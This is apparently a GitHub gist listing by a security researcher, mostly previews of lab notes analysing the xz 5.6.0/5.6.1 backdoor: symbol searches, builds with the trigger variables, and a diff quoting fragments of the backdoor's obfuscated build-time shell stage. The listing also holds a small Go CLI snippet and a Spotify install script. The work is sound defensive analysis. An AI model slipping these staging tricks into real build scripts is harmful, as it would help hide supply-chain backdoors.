Omachonu Ogali oogali
oogali
/ search.txt
Created
March 31, 2024 18:24
searching for symbols present in xz 5.6.0 trojan, but not in code base
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| oogali@lab-bullseye:~/xz-5.6.0$ for sym in $(bingrep trojan.o | grep SHT | grep '\.text\.' | grep -v rela | awk '{ print $2 }' | sed 's/\.text\.//; s/.$//' | sort | uniq) ; do echo "==> ${sym}" ; ag -as --cc "${sym}" ; echo ; done | |
| ==> _cpui | |
| src/liblzma/check/crc_x86_clmul.h:406: __cpuid(r, 1); | |
| src/liblzma/check/crc_x86_clmul.h:411: success = __get_cpuid(1, &r[0], &r[1], &r[2], &r[3]); | |
| ==> _get_cpui | |
| src/liblzma/check/crc_x86_clmul.h:411: success = __get_cpuid(1, &r[0], &r[1], &r[2], &r[3]); | |
| ==> auto_decod | |
| tests/test_memlimit.c:131:test_memlimit_auto_decoder(void) |
oogali
/ 01-build.txt
Last active
March 31, 2024 17:06
more xz v5.6.1 testing (reproducing what we collectively know)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| oogali@lab-bullseye:~$ tar zxvf xz-5.6.1.tar.gz | |
| ... | |
| oogali@lab-bullseye:~$ cd xz-5.6.1 | |
| oogali@lab-bullseye:~/xz-5.6.1$ export CC=gcc | |
| oogali@lab-bullseye:~/xz-5.6.1$ export RPM_ARCH=x86_64 | |
| oogali@lab-bullseye:~/xz-5.6.1$ ./configure | |
| ... | |
| oogali@lab-bullseye:~/xz-5.6.1$ make -j4 | |
| ... | |
| oogali@lab-bullseye:~/xz-5.6.1$ ls -la src/liblzma/.libs/liblzma.* |
oogali
/ delta.diff
Created
March 31, 2024 15:35
difference between bad-3-corrupt_lzma2.xz in xz 5.6.0 vs 5.6.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- ../5.6.0.txt 2024-03-31 11:33:02.350025845 -0400 | |
| +++ ../5.6.1.txt 2024-03-31 02:57:36.563153062 -0400 | |
| @@ -7,2 +7,3 @@ | |
| U="bad-3-corrupt_lzma2.xz" | |
| +[ ! $(uname)="Linux" ] && exit 0 | |
| eval $zrKcVq | |
| @@ -18,2 +19,19 @@ | |
| eval `grep ^gl_path_map=\' config.status` | |
| +vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null` | |
| +if test "x$vs" != "x" > /dev/null 2>&1;then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ git log tests/files/good-1-riscv-lzma2-1.xz | |
| commit 0b4ccc91454dbcf0bf521b9bd51aa270581ee23c | |
| Author: Jia Tan <jiat0218@gmail.com> | |
| Date: Sat Mar 9 10:05:32 2024 +0800 | |
| Tests: Update RISC-V test files. | |
| This increases code coverage and tests for possible shifting bugs. | |
| commit 3060e1070b2421b26c0e17794c1307ec5622f11d |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections" | |
| C="pic_flag=\" $P\"" | |
| O="^pic_flag=\" -fPIC -DPIC\"$" | |
| R="is_arch_extension_supported" | |
| x="__get_cpuid(" | |
| p="good-large_compressed.lzma" | |
| U="bad-3-corrupt_lzma2.xz" | |
| [ ! $(uname)="Linux" ] && exit 0 | |
| eval $zrKcVq |
oogali
/ build-with-triggers.txt
Created
March 31, 2024 06:28
xz 5.6.1 builds with and without trigger envs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| oogali@lab-bullseye:~/playground/xz-backdoor$ tar zxvf ~/xz-5.6.1.tar.gz | |
| ... | |
| oogali@lab-bullseye:~/playground/xz-backdoor$ cd xz-5.6.1 | |
| oogali@lab-bullseye:~/playground/xz-backdoor/xz-5.6.1$ export CC=gcc | |
| oogali@lab-bullseye:~/playground/xz-backdoor/xz-5.6.1$ export RPM_ARCH=x86_64 | |
| oogali@lab-bullseye:~/playground/xz-backdoor/xz-5.6.1$ time ./configure | |
| ... | |
| real 0m6.587s | |
| user 0m5.081s |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 1st run, without targeted environment variables | |
| oogali@lab-bullseye:~/playground/xz-backdoor$ tar zxvf ~/xz-5.6.1.tar.gz | |
| ... | |
| oogali@lab-bullseye:~/playground/xz-backdoor$ cd xz-5.6.1/ | |
| oogali@lab-bullseye:~/playground/xz-backdoor/xz-5.6.1$ echo $CC | |
| oogali@lab-bullseye:~/playground/xz-backdoor/xz-5.6.1$ echo $RPM_ARCH | |
| oogali@lab-bullseye:~/playground/xz-backdoor/xz-5.6.1$ ./configure | |
| ... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| oogali@nighthawk:~$ bingrep -D /lib/x86_64-linux-gnu/liblzma.so | less -XR | |
| ELF DYN X86_64-little-endian @ 0x3510: | |
| e_phoff: 0x40 e_shoff: 0x263c0 e_flags: 0x0 e_ehsize: 64 e_phentsize: 56 e_phnum: 9 e_shentsize: 64 e_shnum: 28 e_shstrndx: 27 | |
| ProgramHeaders(9): | |
| Idx Type Flags Offset Vaddr Paddr Filesz Memsz Align | |
| 0 PT_LOAD R 0x0 0x0 0x0 0x2bc8 0x2bc8 0x1000 | |
| 1 PT_LOAD R+X 0x3000 0x3000 0x3000 0x176fd 0x176fd 0x1000 | |
| 2 PT_LOAD R 0x1b000 0x1b000 0x1b000 0xaa6c 0xaa6c 0x1000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| func init() { | |
| cobra.OnInitialize(initConfig) | |
| viper.SetEnvPrefix("VOYAGER") | |
| viper.SetEnvKeyReplacer(strings.NewReplacer(".", "_")) | |
| viper.AutomaticEnv() | |
| rootCmd.PersistentFlags().StringVar(&cfgFile, "config", "", "config file (default is $HOME/.voyager.yaml)") | |
| rootCmd.PersistentFlags().BoolP("debug", "d", false, "Enable debug logging") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Combined instructions from: | |
| # - https://www.spotify.com/us/download/linux/ | |
| # - https://stackoverflow.com/a/69015383 | |
| # | |
| # @oogali | |
| curl https://download.spotify.com/debian/pubkey_5E3C45D7B312C643.gpg | \ | |
| gpg --no-default-keying --keyring gnupg-ring:/etc/apt/trusted.gpg.d/spotify.gpg --import |
NewerOlder